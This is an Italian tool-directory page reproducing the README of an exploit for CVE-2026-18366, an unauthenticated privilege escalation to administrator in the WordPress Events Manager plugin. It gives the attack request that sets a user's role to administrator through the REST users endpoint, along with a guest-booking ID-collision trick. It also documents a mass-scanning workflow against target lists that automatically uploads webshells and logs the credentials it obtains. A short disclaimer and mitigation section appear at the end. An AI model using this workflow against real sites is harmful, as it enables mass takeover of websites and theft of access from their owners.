Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-18366 — Events Manager < 7.4.1 - Escalation dei privilegi non autenticata ad Amministratore | Kitploit
Strumenti/GitHubGitHub/nxploited/cve-2026-18366
Escalation di PrivilegiScanner di Vulnerabilità WebExploitSfruttamento di Applicazioni WebRaccolta InformazioniPost-Exploit
GitHubnxploited/cve-2026-18366

CVE-2026-18366

Events Manager < 7.4.1 - Escalation dei privilegi non autenticata ad Amministratore

Vedi Repository
1124 giorni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-18366

Events Manager < 7.4.1 - Escalation dei privilegi non autenticata ad Amministratore

CVE CVSS WordPress

Typing SVG


🔗 Rimani Aggiornato

Telegram

Per le ultime zero-day, exploit e ricerche sulla sicurezza

Telegram Channel


📋 Panoramica della vulnerabilità


🔍 Descrizione tecnica

Analisi della causa radice

La vulnerabilità risiede in EM\Archetypes::map_meta_cap all'interno di classes/em-archetypes.php. Il plugin limita in modo improprio il mapping delle proprie capability:

  1. Tratta QUALSIASI ID di oggetto come ID di post
  2. Se il post è un CPT event o location, azzera $caps = []
  3. Non ricarica mai le capability per edit_user, delete_user o promote_user
  4. Capability vuote → has_cap() restituisce true, anche per l'utente 0 (ospite)

Vettore di attacco

root@kitploit:~
POST|PUT|PATCH  /wp-json/wp/v2/users/{id}
POST            /index.php?rest_route=/wp/v2/users/{id}

Body: {"password":"...","roles":["administrator"]}

Condizione: {id} deve corrispondere a wp_posts.ID di un CPT di tipo event o location.

⚠️ L'API REST non autenticata non richiede un nonce (nessun cookie di sessione).

Sfruttamento delle prenotazioni ospite

Le prenotazioni ospite (dbem_bookings_anonymous=1 per impostazione predefinita) creano utenti WordPress reali, consentendo il forzamento della collisione degli ID. Il nonce di prenotazione è disponibile pubblicamente nei moduli degli eventi.


🚀 Utilizzo

Requisiti

root@kitploit:~
pip install aiohttp

Avvio rapido

root@kitploit:~
python CVE-2026-18366.py

Lo script richiederà:

  • list → Percorso del file con l'elenco dei target (predefinito: list.txt)
  • speed → Worker concorrenti (predefinito: 10)

Opzioni della riga di comando

root@kitploit:~
python CVE-2026-18366.py -l targets.txt -s 20 --timeout 30
OpzioneDescrizione
-l, --listPercorso del file contenente gli URL target
-s, --speedNumero di worker concorrenti (1-200)
--timeoutTimeout delle richieste in secondi (predefinito: 20)

Formato dell'elenco target

Crea un file list.txt con un target per riga:

root@kitploit:~
https://target1.com
https://target2.com/wordpress
http://target3.com
target4.com

📊 Output

Output della console

root@kitploit:~
[+] [HH:MM:SS] target.com  ADMIN  username:password  uid=X  path
[+] [HH:MM:SS] target.com  SHELL  https://target.com/wp-content/plugins/...

File dei risultati

Le compromissioni riuscite vengono salvate in adminS.txt:

root@kitploit:~
https://target.com | username:Nx_admin_@!KSA | uid=X | path=id-collision | ADMIN | shell_url

🔄 Flusso di sfruttamento

root@kitploit:~
┌─────────────────────────────────────────────────────────────────┐
│                    CVE-2026-18366 Flow                          │
├─────────────────────────────────────────────────────────────────┤
│                                                                 │
│  ┌──────────┐    ┌─────────────┐    ┌──────────────────────┐   │
│  │  Detect  │ →  │ Collect IDs │ →  │  PATH A: ID Brute    │   │
│  │  Plugin  │    │  (CPT/HTML) │    │  REST /users/{id}    │   │
│  └──────────┘    └─────────────┘    └──────────┬───────────┘   │
│                                                 │               │
│                                          ┌──────▼──────┐        │
│                                          │   Success?  │        │
│                                          └──────┬──────┘        │
│                                       No │      │ Yes           │
│                               ┌──────────▼──────▼──────────┐    │
│                               │                            │    │
│  ┌──────────────────────┐     │    ┌─────────────────┐     │    │
│  │  PATH B: Guest Book  │ ←───┘    │  Login + Verify │     │    │
│  │  Create user until   │          │  Admin Access   │     │    │
│  │  user_id == post_id  │          └────────┬────────┘     │    │
│  └──────────────────────┘                   │              │    │
│                                    ┌────────▼────────┐     │    │
│                                    │  Upload Shell   │     │    │
│                                    │  (Plugin/Theme) │     │    │
│                                    └────────┬────────┘     │    │
│                                             │              │    │
│                                    ┌────────▼────────┐     │    │
│                                    │   Save Results  │     │    │
│                                    │   adminS.txt    │     │    │
│                                    └─────────────────┘     │    │
│                                                            │    │
└────────────────────────────────────────────────────────────────┘

⚙️ Caratteristiche

  • Architettura asincrona → Scansione concorrente ad alte prestazioni
  • Doppi vettori di attacco → Collisione ID + sfruttamento delle prenotazioni ospite
  • Upload automatico della shell → Deployment di webshell in plugin/tema
  • Rilevamento della versione → Identificazione automatica delle versioni vulnerabili
  • Enumerazione intelligente degli utenti → Molteplici tecniche di enumerazione
  • Verifica del login → Validazione cookie + XML-RPC
  • Escalation dei privilegi → Promozione automatica ad amministratore

📁 Struttura dei file

root@kitploit:~
├── CVE-2026-18366.py    # Main exploit script
├── list.txt             # Target URLs (create this)
├── adminS.txt           # Successful results (auto-created)
└── README.md            # This documentation

⚠️ Disclaimer

root@kitploit:~
╔══════════════════════════════════════════════════════════════════╗
║                        LEGAL DISCLAIMER                          ║
╠══════════════════════════════════════════════════════════════════╣
║                                                                  ║
║  This tool is provided for EDUCATIONAL and AUTHORIZED           ║
║  SECURITY TESTING purposes only.                                ║
║                                                                  ║
║  • Only use on systems you own or have explicit permission      ║
║  • Unauthorized access to computer systems is ILLEGAL           ║
║  • The author is NOT responsible for any misuse or damage       ║
║  • By using this tool, you agree to these terms                 ║
║                                                                  ║
║  Use responsibly. Stay ethical. Respect the law.                ║
║                                                                  ║
╚══════════════════════════════════════════════════════════════════╝

🛡️ Mitigazione

Se sei un amministratore WordPress:

  1. Aggiorna Events Manager alla versione 7.4.1 o successiva
  2. Controlla gli account utente per modifiche non autorizzate
  3. Esamina i log di accesso per attività sospette sulle API REST
  4. Implementa regole WAF per filtrare le richieste dannose

👤 Autore

Nxploited (Khaled Alenzi)

Telegram


Ricerca sulla sicurezza • Hacking etico • Scoperta di zero-day

Scarica lo strumento
AttributoDettagli
CVE IDCVE-2026-18366
Gravità🔴 CRITICA (CVSS 9.8)
PluginEvents Manager per WordPress
Versioni interessate< 7.4.1
Tipo di vulnerabilitàEscalation dei privilegi non autenticata
Vettore di attaccoRete
Autenticazione richiestaNessuna